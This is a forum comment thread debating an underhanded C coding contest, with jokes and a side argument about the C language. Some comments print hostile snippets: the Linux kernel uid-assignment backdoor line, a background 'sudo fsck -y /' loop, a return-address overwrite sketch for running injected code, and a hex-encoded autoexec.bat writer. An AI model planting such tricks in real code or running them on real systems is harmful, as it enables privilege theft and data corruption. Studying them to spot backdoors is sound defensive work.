[simulacrum25]

Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

Re:Why?

[Nf1nk]

To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
It is sort of like the computer version of a bomb squad.

Re:Why?

[IainHere]

simulacrum25 said,

Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

Dicionary.com describes simulacrum as,

1. An image; a representation.
2. An insubstantial, superficial, or vague likeness or semblance.

So, Mr Simulacrum25 (if that is indeed your real name!), care to tell us why you're so scared of other people looking in to ways of secretly concealing information in otherwise innocent looking image files?

Re:Why?

[Xcott+Craver]

Who is behind this and what is their motivations?

Is Google down? Okay, I updated the faq to tell you who we are.

Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

Xcott

Re:Why?

[Frank+T.+Lofaro+Jr.]

Remember the recent Linux contamination

Something like:

if (blah || blah || uid=0) {
blah;
} ...

Re:Why?

[KidSock]

To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.

OR

Having contests like these creates a sample base of dangerous code and clever tricks that evil doers can use to craft subtley malicous code in open source projects.

Re:Why?

[legirons]

"Who is behind this and what is their motivations?"

I seem to remember a precursor to this type of competition (after the diebold fiasco) where the entrants had to write an vote-counting program which would appear to be correct, but actually modify the result in a non-obvious (from reading the code) way...

Re:Why?

[Maestro4k]

Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors. And what exactly about this isn't a learning endeavor? If people can pull off hiding fingerprinting code in an image processing programming that survives visible code inspection then I'd say we've all learned a VERY valuable lesson. We can study what they did, and how they hid it and we'll be able to look for that type of behaivor in the future. Who's to say that something like this isn't hidden in some project somewhere right this minute? It's possible (although unlikely) but knowing _WHAT_ to look for will make it even less likely and put us a lot further along to making it impossible. In a day of professional computer hackers, this is not a contest to have. You know this sounds an awful lot like the arguments against disclosing vulnerabilities. "If we report them then the Evil Hackers (tm) will be able to use them!" The problem there, and here, is that the Evil Hackers (tm) aren't going to just sit around idly and wait till white-hats find the problems. They'll look for them themselves, and being Evil Hackers (tm) they're not going to tell the white-hats about them. We've got to find the problems ourselves and be prepared to defend against them. Here we have a chance to find out if this type of code hiding is possible, and to see ways it can be done. Then we can watch to make sure the Evil Hackers (tm) don't manage to sneak something similar past us.

Re:Why?

[UserGoogol]

Because it's funny.

Re:Why?

[iluvcapra]

Methinks the poster refers to this, wherein some as yet uinidentifed party inserted a line into the kernel sources on the CVS repository.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

if these random options are passed, and the uid of the "current" struct is 0, then do the block, right? 8^o Fortunately, some sharp programmers caught this before those files got integrated back into the kernel, but who knows what the future may bring.

Re:Why?

[zallus]

The malicious people would already have a base of such information, and would gather it themselves whether such a contest existed or not. However, this only seeks to additionally expose such tricks to view of neutral and positive parties. I would say that parties with all intents (-x + 0 + x) having access to subject material is much better than purely malicious persons (-x) having access. Would you rather a book on bomb building were in a prison library, or a public library?

Re:Why?

Correct. If you read up on the folks running it (http://www.princeton.edu/~sacraver/, http://www.ee.binghamton.edu/pages/craver.html, http://www.ws.binghamton.edu/fridrich/), you'll see that much of their research has obvious military and national security applications (see http://www.ws.binghamton.edu/fridrich/projects.htm l for examples).

Other articles, such as http://www.papillonsartpalace.com/howT.htm, http://inside.binghamton.edu/May-June/10MAY01/frid rich.html, and especially http://inside.binghamton.edu/November-December/13d ec01/security.html point to the common theme of research into countering covertly evil data or programs. This contest, then, could contribute towards this goal by offering numerous known examples of how innocent-looking code could conceal malicious conduct. Presumably this knowledge would/could be rolled into systems for intercepting or identifying actual instances of this kind of sneakiness "in the real world" (ie, our good friend Homeland Security).

I am also captivated by Dr. Fridrich's Rubix cube skills. And to think, I just graduated from SUNY B and never even met her. A shame.

Re:Why?

[ArtStone]

of course that cuts both ways. It could give aging script kiddies ideas for methods to attempt to insert bogus code into an open source project that they were incapable of thinking of on their own.

Just like Orwell's "1984" was a warning, it also has the potential to become a roadmap.

it's been here all along

[xmp_phrack]

look over SE linux code.

Exactly how are they going to test this?

[neo]

"And now we test program number one which computes Pi to the 13th digit.... wait...um, the whole system is smoking and there are sparks. Oh crap, the test computer is melted. End of contest, sorry guys!"

Here's my entry:

[stinky+wizzleteats]

title Windows
root (hd0,0)
chainloader +1

Now where's my beer?

Diebold Hiring the winner!

[tvlinux]

Help Wanted:
Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers

Re:Indeed. This could be a field day for Java and

[Xcott+Craver]

Correct, making it look valid is the main purpose of the contest.

Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.

That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.

Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.

Xcott

Re:NOT FUNNY: Chinese Hackers

That report was written in 1997.
I think you're sino-bashing and trolling.

Cheating?

[Maxwell'sSilverLART]

Am I required to submit original source code, written by me, or can I merely submit the leaked Windows source, and thus be assured of victory?

Re:Cheating?

[tonsofpcs]

Hey, you stole my idea! Now i'll have to take the Windows source code and give it a different name, how about 'Bob'? I like 'Bob'.

Mod Parent Up!

My original post was to be along the lines of 'how long before this kind of technique is used to poison Open Source?'...

Tin foil hat on, for sure. :)

Is Malicious Intent Required?

I would submit some of my co-workers' code but there was no malicious intent present. Does this count?

I mean, couldn't we just *pretend* that they were really really smart and diabolical and had wanted to take down the entire mainframe?

It's really tough holding back when you know you've got a winner!-))

Would the Windows source code count?

[Sniper_Peabody]

It looks innocent but is about as evil as it gets.

Re:Would the Windows source code count?

Since when is Hungarian Notation innocent looking?

Re:Indeed. This could be a field day for Java and

That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches.

C++ would have been even more interesting, what with operator overloading and all. Who knows what "A + B" may do, given the proper context? The abstraction power lets you have much higher-level "mistakes."

Java even provides interesting opportunities for evil, you've got method overloading and that great gremlin, threads. "Accidently" call that method with the wrong type and exploit a thread timing bug to kick the dog.

Subtlety

[Dirtside]

The prize is beer.

...but the beer is poisoned!

Re:Subtlety

[the+grace+of+R'hllor]

That would be too simple. Make it one beer, laced with component 1 of some tasty epoxy. Let's call it Beer 1. Make all other beer present, Beer 2, contain component 2 of some tasty epoxy.

Serve Beer 2 to winner quickly after he finishes Beer 1. Everyone else will be fine, and for some mysterious reason, the winner collapses into a painful heap.

Finding a tasty epoxy is going to be tricky though.
--
Frank

Re:Subtlety

[cpeikert]

But you also get a free frogurt!

Re:Subtlety

[Dirtside]

The frogurt is also cursed.

Re:Subtlety

[N1ghtFalcon]

But you get your choice of topping.

Re:Subtlety

[Minwee]

But the toppings contain sodium benzoate.

Re:Subtlety

(That's bad)

Re:Subtlety

[RPI+Geek]

Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.

I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.

Re:Surely?

Seriously though, your not kidding... Just create something thats useful only have an easily exploitable buffer overflow somewhere in there. The program does what the user intends for it to do, but at the same time leaves a backdoor for a hacker. Microsoft deserves many cases of beer.

All 4th grade style up in here

[LandownEyes]

Seriously, when I first read the headline I thought they meant writing C in cursive handwriting. Truth be told, I was pretty dissapointed to find out that wasn't actually the case at all.

Re:All 4th grade style up in here

Have you ever tried changing the font in your coding program of choice to Zapfino? It's great.

(yeah, yeah, I know you use emacs/vi/pico/echo exclusively, shut up)

Obscurifacation

[MrIcee]

Once, many moons ago, we wrote an obscurifaction program that removed all documentation and modified all variables and function names to be random combinations of I's, O's, o's, 0's. and 1's (plus is created rather long names of fairly equal length). It also combined lines to make them all very long.

Especially useful on large programs it pretty much made the source totally unreadable, and a complete headache to try to unravel even if you countered with a similar program - because all meaning in the original names was lots.

However, when working as a contractor such programs can be useful insurance policies :)

Re:Obscurifacation

This sounds a lot like what you described:
More information

C-style vs Java-style language features

[Anonymous+Brave+Guy]

Anyone can write malicious code in C, but it takes a real pro with real knowledge to even begin to try that with Java.

I assume you're joking, since Java is as vulnerable to typical attacks like SQL injection just as much as many other languages, with just the same sort of careless slip in a couple of lines by a tired programmer...

Possibly obfuscated intentions

[nanoakron]

Am I the only one suspicious of the fact thet their first 'posted challenge' is also something that has commercial value, especially in the realm of DRM?

-Nano.

Re:Possibly obfuscated intentions

[DickBreath]

...suspicious of the fact thet their first 'posted challenge' is also something that has commercial value, especially in the realm of DRM?

It also means that an army of coders have considered and may recognize numerous different approaches to hiding this kind of watermarking.

Re:Possibly obfuscated intentions

[nanoakron]

Good point...

-Nano.

An example from years ago

[exp(pi*sqrt(163))]

There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:

char *s = "Fortune coookie";
int *p = (char *)s;
for (i = 0; i<4; ++i) {
putchar(((char *)p)[i]);
}

Looks innocent enough. But actually it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)

Re:An example from years ago

On a 64 bit machine, your program would print...

FcSegmentation Fault

Re:An example from years ago

Who ran DOS on 64bit machines exactly?

Re:An example from years ago

[dustmite]

Uhm .. that can't be, sizeof(int) on DOS is 16 bits.

Unless you meant the Watcom compiler for DOS4GW? BIG difference.

DOS = 16-bit real-mode. DOS4GW = 32-bit protected mode.

Re:An example from years ago

[exp(pi*sqrt(163))]

It was for DOS4GW but I think you're being pedantic.

Re:An example from years ago

[dustmite]

Hmm, yes, I probably was :)

Some dude from Microsoft is gonna win...

[swillden]

He'll submit the source code to IE.

When will we see this pop up in the real world?

[creative_Righter]

Every year, we will propose a challenge to coders to solve a simple data processing problem, but with covert malicious behavior. Examples include miscounting votes, shaving money from financial transactions, or leaking information to an eavesdropper. The main goal, however, is to write source code that easily passes visual inspection by other programmers.

Oh dear, now we're rewarding people for writing actual malicious code that is designed to pass visual inspection from other programmers.

When these sort of tricks will show up eventually in actual voting machines or the gigantic corpus of finincial code that's been hacked together?

Or when will we start to find the underhanded tricks in things we use?

Re:When will we see this pop up in the real world?

[xAXISx]

Sounds like a sequel to "Office Space"

Re:When will we see this pop up in the real world?

[RebelWithoutAClue]

The thing is, Is there already code like this out there, and what does it look like ?

Re:When will we see this pop up in the real world?

[CAIMLAS]

Well, at least we'll know what kind of behavior to look for.

The prize is beer

[frovingslosh]

The prize is beer.

Well, nothing could go wrong here, since we all know that all C programmers are over 21. And if by any chance the winner wasn't over 21 they would make that clear and refuse their prize.

The next day the headlines read" " C Programmers Give Minors Beer, Drunken Night of Celebration Kills 6 in Traffic Acciident ". Reactionary congressmen urged on by a powerful lobby from Washington State quickly pass laws to outlaw all C programming outside of Microsoft.

Re:The prize is beer

Beer doesn't kill people - cars kill people.

Also: guns don't kill people - rappers do.

So are you very, very good or very, very bad?

[Anonymous+Brave+Guy]

This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today"

If you sincerely believe this is not a hard task, then you're either very, very good at programming, or really not very good at all.

Most developers aren't very good at writing clear, concise code that actually does what it's supposed to. Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

Re:So are you very, very good or very, very bad?

[anno1602]

Writing code of that quality that looks like it does what it's supposed to do, while actually doing something subtly different, sounds like a very difficult challenge to me.

Programmers do that every day. It's called a "bug". Now, doing something subtly different and controlling what the subtly different thing actually is, that is a challenge.

Re:So are you very, very good or very, very bad?

[Anonymous+Brave+Guy]

Programmers do that every day.

Most of them don't. In fact, most don't even get close to the "clear and concise" requirement. Of those who do, very few introduce large numbers of bugs that wouldn't be turned up by a competent code review; the fact that most coding shops don't perform such reviews routinely does not reduce the significance of this!

Re:Indeed. This could be a field day for Java and

[TheLink]

First thing I thought of was sendmail, bind or any of the other ISC stuff ;).

There are tons of C programs that look valid, but given some prompting can behave in arbitrarily evil ways.

If you want it to automatically behave in an evil way without a "little extra encouragement" then I suppose it would be a bit harder.

Why assume C-specific tricks?

[argent]

It's unlikely that any techniques that really pass inspection will be C-specific. "Obfuscated coding contest tricks" won't help, because the code has to look benign, and weird comments and variable names and odd spacing won't help.

And once again...

[halleluja]

telnet.c is the winner of all times.

here's my entry

[thdexter]

#include <notavirus.h>
#include <seriouslyitisnt.h>

So long as they don't check notavirus.h I think I'm in the clear for visual inspection.

Re:here's my entry

[unholyness]

"When I get to the bottom I go back to the top of the slide, then I stop and I turn and I go for a ride." Then I get slapped by a woman shouting 'this ride is for children only!'

easy

[RailGunner]

The Windows Auto Blue screen... (yes, even XP still blows up on this):

int main (){
for (int i = 0; i < 100000; i++)
printf ("\t\t\b\b\b\b\b");
}

how's this?

[spongman]

int main () { WinExec ("iexplore.exe"); }

Re:how's this?

Haha! Clever!

Douchebag.

Re:how's this?

You went through all the trouble to declaring main() an integer, but didn't return 0 ? Tsk tsk

Re:how's this?

It's Internet Explorer. He's assuming the computer will be compromised before it would reach the return statement.

Re:how's this?

[dgatwood]

Here's one. Only likely to work on certain BSD-derived systems, since Linux and some BSDs map -y onto -p, and most warn before checking a read-write-mounted filesystem, but....

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define test_app "/sbin/fsck" // fix path as needed

int main(int argc, char *argv[])
{

pid_t pid = fork();
if (!pid) {

// we're the child. Start fsck repeatedly in the background.
while (1) {
system("sudo " test_app " -y /");
sleep(5);
/* pid = fork(); sleep(5); */ // Optional, but more fun.

}

}
return 0;
}
Looks harmless, but if your filesystem is mounted read-write... interesting inconsistencies can develop as the kernel and user space views may disagree as to what certain filesystem structures should look like.... Probably not an issue if you have a unified buffer cache model, so most modern systems aren't a problem, but I still wouldn't try it.

Re:how's this?

[Zerth]

In such a case, you should assume that any cleanup code or return values are unnecessary.

Much like the control loop for a guided missile:)

Re:how's this?

[Theatetus]

Don't you mean

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nCmdShow)

?

Re:how's this?

[sinserve]

he could use main/system and be ANSI compatible :-)

Re:how's this?

[spongman]

nope, msvcrt.lib wraps WinMain for console apps.

Re:how's this?

[Rei]

That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.

What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").

for (int x=0; xwidth; x++)
{
const int next_x=(x+1==width ? 0 : x+1);
const int prev_x=(x-1==-1 ? width-1 : x-1);
for (int y=0; yheight; y++)
{
const int next_y=(y+1==height ? 0 : y+1);
const int prev_y=(y-1==-1 ? height-1 : y-1);

const RGB point1 = picture[prev_x][prev_y];
const char point1_r = point1.r / 9;
const char point1_g = point1.g / 9;
const char point1_b = point1.b / 9;

const RGB point2 = picture[x][prev_y];
const char point2_r = point2.r / 9;
const char point2_g = point2.g / 9;
const char point2_b = point2.b / 9; // Etc - continue for 9 points from prev_x to next_x, prev_y to next_y

const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;

next_picture[x][y].r=dest_r;
next_picture[x][y].g=dest_g;
next_picture[x][y].b=dest_b;
}
}

In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.

If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities. :) I can't wait to see the results.

Re:how's this?

[tonsofpcs]

How will you know if the code works if you don't test it?!?! Who taught you how to program? Now go test it and (if you still can), report back with results and changes until it works.

Re:how's this?

[tonsofpcs]

How will you know if the code works if you don't test it?!?! Who taught you how to program? Now go test it and (if you still can) report back with results and changes until it works.

Re:how's this?

[dgatwood]

My code doesn't spawn every five seconds (unless you enable the commented-out 'evil' line). It runs fsck in the background, restarting it five seconds after the last one ends. It's the sort of thing you could easily convince a newbie sysadmin would be a good idea. Imagine never having filesystem corruption because your system is constantly checking in the background. (Use a bigger delay if 5 seconds seems too extreme.) The point is that it is never safe to do so on a read-write filesystem, but a lot of people won't realize that....

IMHO, changing the link pointer is way too easy. I mean if you allow that, then this qualifies, at least on Linux-x86:

#define CODE_LENGTH 32 // or whatever the real length is

int evilfunction(void)
{
int pos = 0xff & 0xff00; // zero.
int array[CODE_LENGTH] = {
/* here, someone inserts a bunch of integers that are actually the raw compiled bytes to issue some arbitrary system call, followed by some no-op padding (to align the hole at the end), followed by a jump instruction, followed by a 4-byte hole for the target of the jump, aligned to a 4-byte boundary. CODE_LENGTH should include the four byte jump target, but not one byte more. */ };

array[CODE_LENGTH-1] = array[pos-1]; // copy the old link pointer (return address) to the hole after the jump instruction.

array[pos-1] = (int)&array[0]; // set new link pointer to start of the array

return 0; // execute the code and return....
}

Personally, I hardly think that qualifies as particularly interesting, though it is certainly evil.....

Re:how's this?

Perhaps you should go through the trouble of reading the standard. Main must be declared to return int, but if no return statement is provided in main, the compiler returns 0. It's perfectly standard-complient.

Re:Indeed. This could be a field day for Java and

[argent]

That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place.

Actually, that's not really the case... not for the kind of "malicious code" that they're talking about here. They're not talking about "getting out of the sandbox", they're talking about "hiding information in the output". It's actually a lot easier to hide this kind of "malicious code" in an object-oriented language because you can play games with the namespace.

Re:NOT FUNNY: Chinese Hackers

I think you're sino-bashing and trolling.

And I think you're replying to yourself. You have a hand on one keyboard and your other hand on another and they're talking to each other through Slashdot.

Re:Seems a bit like those

Seems a bit like a Microsoft sponsored hacking contest.

Innocent-looking code that is malicious. What are one of the arguments in favor of open source? Trust?

Here comes Bill Gates telling us that even innocent-looking open source code can be as malicious as anything that Microsoft can dream up.

Boring.

[Inmatarian]

#include "stdio.h"
const char * tempfile = { 0x63, 0x3a, 0x5c, 0x61, 0x75, 0x74, 0x6f, 0x65, 0x78, 0x65, 0x63, 0x2e, 0x62, 0x61, 0x74, 0x00 };
const char * buffer = { 0x40, 0x72, 0x65, 0x6d, 0x20, 0x49, 0x74, 0x73, 0x20, 0x61, 0x6e, 0x6e, 0x6f, 0x79, 0x69, 0x6e, 0x67, 0x20, 0x77, 0x68, 0x65, 0x6e, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x20, 0x69, 0x73, 0x20 ,0x68, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x2e, 0x0d, 0x0a, 0x00 };
int main( int argc, char ** argv )
{
freopen(stdout, tempfile, "wb");
fprintf(stdout, buffer);
return 0;
}

"Daddy, whats this strange message when the computer turns on? Is it broken?"

"No son, you've just run malicious code written by a nerd whose probably in his 30s, living in his mom's basement and still a virgin. Haha, he's a loser."

"Daddy, these old machines suck, can I go back to playing BloodSprayer 2: Torn Flesh Gangrene?"

"Only after you've mowed the lawn son."

"Dad, F**K you."

"Haha!"

Crash Windows with printf

[zdv]

I distinctly remember crashing Windows 2000 with a single printf statement, IIRC the code was something like:

printf("Hello\t\b\b\b\b\b\b\b");

The problem was some system DLL and transcended Windows versions...

Linux Kernel Backdoor Attempt

[Johnny+Hardcore]

This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

The attempt was trying to insert

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).

C is an awful language

[Urusai]

You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.

Re:C is an awful language

[jejones]

Well...

C is good for what it was first used for: writing Unix. At least initially, it was mimimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay for details.)

(It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)

Re:Cheating? Flamebait +5!

It may be flamebait, but its +5 flaimbait :)

Not so

I hear Microsoft are going to enter Longhorn.

New law.

[elucido]

Anyone who has to make use of Godwins law obviously must agree with Hitler. Godwins law is equal to censorship. Just because you dont discuss Hitler, the nazis, fascism, etc does not mean it suddenly ceased to exist.

The new law which evolves beyond godwins law to allow people to discuss hitler shall be called what? Slashhdot can think of a name right?

Re:Indeed. This could be a field day for Java and

[jrumney]

Java even provides interesting opportunities for evil, you've got method overloading and that great gremlin, threads.

The unexpected fact that byte is signed can also be used to advantage in Java.

I win

[hkb]

#include

I win.

Re:I win

[woah]

test.c:1: `#include' expects "FILENAME" or <FILENAME>

No, you FAIL it.

So The Hard Part Is To

[Master+of+Transhuman]

"write clear, readable, innocent-looking C code", right?

Wow, nobody's going to win this one.

I'll take the bait

[The+Infamous+Grimace]

One of the rules is that you need to write it in C. I have no idea what language you're writing in but it's not C.

You do know that '/*' and '*/' are the comment delimiters for C, and that anything that falls between them is ignored by the C compiler?

(tig)

Re:I'll take the bait

[Anonymous+Brave+Guy]

You do know that '/*' and '*/' are the comment delimiters for C, and that anything that falls between them is ignored by the C compiler?

Yes, I'm pretty sure he knew that.

And, as he says, there are still several errors. :-)

Re:I'll take the bait

What are they?

I don't see any, assuming evil() is prototyped in stuff.h

Re:I'll take the bait

[Anonymous+Brave+Guy]

Blockquoth the AC:

What are they?

Well, the #include line doesn't use either <> or "". Then there's the main function, which ought to be int main(void). Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

Re:I'll take the bait

[Dwonis]

Finally, AFAICR C doesn't support the implicit return at the end of main that C++ does, so there's a missing return statement. (I may be wrong about the third one if it was fixed in C99; I don't have a copy of the revised standard handy.)

You are correct. This is from ISO/IEC 9899:1999(E):

5.1.2.2.3 Program termination 1 If the return type of the main function is a type compatible with int, a return from the initial call to the main function is equivalent to calling the exit function with the value returned by the main function as its argument; reaching the } that terminates the main function returns a value of 0. If the return type is not compatible with int, the termination status returned to the host environment is unspecied.

(emphasis added)

Mailing address

[exabrial]

I Have a XP cd that has no patches, where do i send it?

Re:Mailing address

[Mechcozmo]

That's written in QBasic. Sorry.

Open mouth...

[The+Infamous+Grimace]

...insert foot. :-)

(tig)

off topic

[big+daddy+kane]

but please, keep your hoes in check mf doom is awesome

Re:off topic

Holy shit! A mention of MF Doom on /. I am both shocked and excited, BDK, you're my hero of the day.

Obligatory simpsons paraphrase

[Sentry21]

Programmer: 'Take this source code, but beware! It carries a terrible curse!'
Judge: 'That's bad.'
Programmer: 'But it's optimized for PowerPC!'
Judge: 'That's good!'
Programmer: 'PowerPC is also cursed.'
Judge: 'That's bad.'
Programmer: 'But you get your choice of operating systems!'
Judge: 'That's good!'
Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
Judge: 'Can I go now?'

Re:Obligatory simpsons paraphrase

That was seen in Animaniacs as well, when they were submitting their new script to the executives...

You're just not used to it.

[Tyler+Durden]

Problems: difficult to compile

A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

difficult to convert to better languages (thank you preprocessor)

Meaningless troll.

encourages obfuscation

Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

Re:You're just not used to it.

[dcam]

I wouldn't call it a total troll. He does raise two points that I consider worth raising.

1. The pre preocessor. I really am not sure it was a good idea to make this as powerful as it is. It encourages people to put a lot of code in here.

2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start? All you are saving at the moment is a tiny amount of memory which is more than offset by the fact you need to iterate through the entire string to find the end (that or hold another pointer to the end). And no, using a string library is not an answer, this should be built in as a fundimental part of the language, string processing is a part of life.

Yes I have written a fair bit of C.

Feel free to flame away.

Re:You're just not used to it.

[Tyler+Durden]

No flame. There are problems with C, I'll grant that. I don't know if the problem with the pre-processor is that it's too powerful or by convention it is depended on too much. Unfortunately, in some places it requres #defines where a const variable would be better. That and macros for functions where a simple inline keyword would help tremedously. Of course, these have been addresses in C++ and (I think) C99.

I'm not sure about strings. With the really low level stuff like OS development, I can see the case for just contiguous characters terminated by a NULL character. Otherwise it's not so hot.

But I still maintain that C works extremely well for what it was created for. I mean, how long did it take before it needed to change as opposed to C++ that becomes more complex by the hour? (I really have a love/hate attitude towards C++. I think it's a horrible language to match the needs of a horrible world. Then again, I should look more into Objective C.)

C99 addresses a lot of valid concerns with the language, though. That and D sounds promising.

Re:You're just not used to it.

[Dun+Malg]

2. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

Clarity. All the data types in C are intended to be clear. It's only a single step up from assembly, really. C handles strings the same way assembly does: it eats bytes sequentially from an array, and it's up to the programmer to tell the program when it's had enough. Data handling in C is a virtually transparent veneer of abstraction from pointer arithmetic. A string data type with length encoded into it would require special handling, and C just don't play that game. C is all about pounding raw bytes and twiddling naked bits. If you want fancy meta-data, you're using the wrong language. Try C++ of Java.

Re:You're just not used to it.

[syle]

. Strings. There is *no* excuse for C style strings. Is it really such a problem to create a type that has a length encoded into the start?

I think you're confusing C with a high-level language. It doesn't give you lists, associative arrays, or strings because those are high-level data types and C is a low-level language. Your complaints are like saying the biggest problem with a car is you can't drive it on water -- they display a fundamental misunderstanding of the subject.

Re:You're just not used to it.

[csirac]

I think it is very odd you can't believe we're still using C in operating systems. What the other language are we going to use for this task?

Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds? And how exactly is Python, LISP, or any other interpreted/dynamic runtime compiled language going to be used to write a task scheduler or memory managment system worthy of being used in an OS kernel or embedded MCUs with barely 16KiB RAM?

I think you're quite bitter about having to use C for writing applications, which I can perfectly understand. As for what C is actually MEANT for, it does the job quite well. And yes, the preprocessor issues suck, and it would be nice to have Pascal strings, but there really is no alternative to C that I have seen for low-level programming. It makes computer science purists who think everyone should program in Haskell or LISP feel dirty, but it does the job very well. It sure beats writing directly in ASM.

Re:You're just not used to it.

[msgregory@earthlink.]

Tyler Durden wrote:

C is the perfect language for the job it was designed for.

Right, and C was designed for writing perfect programs. If getting something up and running quickly is your primary goal, then by all means stay away from C, but if you want the highest quality program, the kind where you want to meticulously work out every detail by hand, C is the fastest way to get there, hands down.

Re:You're just not used to it.

[Uerige]

There is *no* excuse for C style strings.

I happen to like C style strings. It allows for easy manipulation. When you need something higher-level, user another language (java?), or write a wrapper class.

Re:You're just not used to it.

[alexq]

i think there are some reasonable arguments to be made on C's choice of syntax for certain things.

it's very easy to make some errors that are simply typos, involving (= and == and - and + and -- and ++ and += and -=) (& and && and ^ and *and %) that are completely legal and more or less indetectable, for instance.

(note, i had to type "and" because if i went ",", i encountered slashdot's "lameness filter"... heheh)

Re:You're just not used to it.

[dcam]

When you need something higher-level, user another language (java?), or write a wrapper class.

Unless C++ has changed since I last read K & R, C doesn't have classes. C is not an OO language. I take it you mean C++, which is a different kettle of fish entirely. C++ has an excellent string class in the stl.

Re:You're just not used to it.

[dcam]

Ahhh darn. That should read:

Unless C has changed since I last read K & R, C doesn't have classes. C is not an OO language. I take it you mean C++, which is a different kettle of fish entirely. C++ has an excellent string class in the stl.

Re:You're just not used to it.

[Dun+Malg]

